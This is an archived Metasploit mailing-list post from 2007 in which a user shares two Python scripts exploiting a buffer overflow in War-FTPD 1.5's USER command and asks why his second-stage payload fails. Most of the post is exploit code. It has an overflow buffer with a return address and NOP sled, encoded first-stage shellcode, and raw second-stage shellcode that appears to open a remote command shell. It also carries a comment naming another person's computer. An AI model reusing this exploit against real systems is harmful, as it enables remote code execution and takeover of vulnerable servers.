Metasploit mailing list archives
Building multistage payloaded exploits?
From: j_fast_and_the_furious at hotmail.com (scotty to hotty)
Date: Wed, 26 Sep 2007 02:02:42 +0000
ok, HD i've been hard at work trying to understand how the multistage payload works, but no luck.... so i've decided to post what ive got so far.... well ill first explain what im doing step by step.... first i launch the first script witch works perfectly (it has stage one of shellcode) next i have a second python script witch connects to the first staged code to send the second stage of the exploit. first stage python script: #!/usr/bin/python import socket # bad chars "\x0d\x16\xe2 sc = ("\x89\xe5\xdd\xc7\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x4b\x4c\x42\x4a\x4a\x4b\x51\x57\x4d\x38\x4c\x39\x4b\x4f\x4b" "\x4f\x4b\x4f\x43\x50\x50\x31\x49\x4b\x4c\x4b\x43\x4d\x47\x4c" "\x4c\x4b\x43\x4c\x47\x4d\x43\x48\x45\x51\x4a\x4f\x4c\x4b\x46" "\x37\x51\x30\x43\x31\x4b\x5a\x4c\x4b\x46\x54\x4c\x5a\x45\x51" "\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c\x49\x51\x49\x5a\x44" "\x4d\x45\x51\x49\x52\x4b\x34\x49\x50\x42\x55\x4a\x56\x51\x53" "\x42\x46\x46\x59\x48\x4a\x43\x45\x4a\x43\x50\x4b\x4c\x4b\x50" "\x4f\x47\x54\x43\x31\x4d\x39\x45\x36\x4c\x4b\x45\x4c\x50\x59" "\x4c\x4b\x50\x4f\x45\x4c\x43\x31\x4a\x49\x43\x33\x46\x4c\x4c" "\x59\x4c\x49\x42\x4c\x51\x34\x45\x4c\x43\x51\x4b\x4f\x4d\x30" "\x50\x31\x49\x4b\x42\x44\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51" "\x50\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x45\x38" "\x44\x48\x51\x4e\x45\x36\x46\x33\x43\x56\x42\x48\x47\x43\x46" "\x52\x45\x38\x43\x47\x42\x53\x47\x42\x51\x4f\x50\x54\x43\x56" "\x4e\x59\x42\x52\x45\x30\x4b\x4f\x48\x56\x4c\x55\x50\x53\x46" "\x33\x46\x33\x46\x33\x50\x53\x51\x53\x50\x53\x51\x53\x51\x43" "\x4b\x39\x4a\x47\x43\x56\x4b\x31\x4a\x4f\x44\x48\x45\x52\x50" "\x57\x51\x43\x45\x36\x4e\x59\x4a\x47\x49\x4f\x4b\x4f\x4e\x36" "\x42\x46\x4e\x59\x4e\x48\x42\x4f\x4b\x4f\x49\x46\x4c\x57\x45" "\x36\x45\x38\x46\x50\x46\x59\x43\x56\x50\x53\x4b\x39\x4d\x31" "\x43\x5a\x44\x50\x46\x31\x50\x57\x42\x46\x4e\x59\x4d\x50\x47" "\x4b\x4b\x4f\x48\x56\x46\x33\x46\x37\x43\x56\x4e\x59\x42\x55" "\x51\x59\x4b\x4f\x49\x46\x50\x54\x46\x34\x46\x34\x51\x47\x45" "\x36\x4e\x59\x50\x32\x50\x4c\x4b\x4f\x48\x56\x4d\x47\x50\x50" "\x42\x46\x4e\x59\x50\x33\x48\x4e\x4b\x4f\x48\x56\x4b\x39\x4b" "\x51\x50\x50\x48\x34\x44\x4c\x46\x30\x46\x31\x46\x37\x50\x51" "\x43\x56\x48\x39\x49\x50\x47\x48\x4b\x4f\x4b\x56\x44\x4a\x41" "\x41") #"\xed\x1e\x94\x7c" -> matt wholers computer buffer= "A" * 485 + "\x4a\x75\xd4\x77" + "\x90" * 100 + sc + "\r\n" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.0.108',21)) s.recv(1024) s.send("USER " + buffer + '\r\n') #s.recv(1024) #s.send(sc + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close() Second stage python script:#!/usr/bin/python import socket buffer = ("\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00" "\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01" "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b" "\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" "\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b" "\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" "\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c" "\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53" "\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19" "\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08" "\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee" "\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53" "\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a" "\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d" "\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83" "\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08" "\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc" "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72" "\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4" "\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0" "\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07" "\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74" "\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75" "\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74" "\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff" "\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00" "\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9" "\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75" "\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74" "\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20" "\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28" "\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3") s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.0.108',12345)) s.recv(1024) s.send(buffer) #s.recv(1024) #s.send(sc) s.recv(1024) s.close() i know that the first stage shellcode works its just second stage that doesnt seem to... on the program im exploiting i have ollydbg monitoring for any flagged errors. and it only trips when i send second stage.... anyway you can tell me what im doing wrong?.... anyways... thats my exact script... and if you want to know what prog im exploiting, its warftpd v1.5 ..... so far i have all single stage exploits to work but no luck on getting the multistaged ones to work. _________________________________________________________________ Invite your mail contacts to join your friends list with Windows Live Spaces. It's easy! http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mkt=en-us
Current thread:
- Building multistage payloaded exploits? scotty to hotty (Sep 22)
- Building multistage payloaded exploits? H D Moore (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? H D Moore (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 25)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? H D Moore (Sep 24)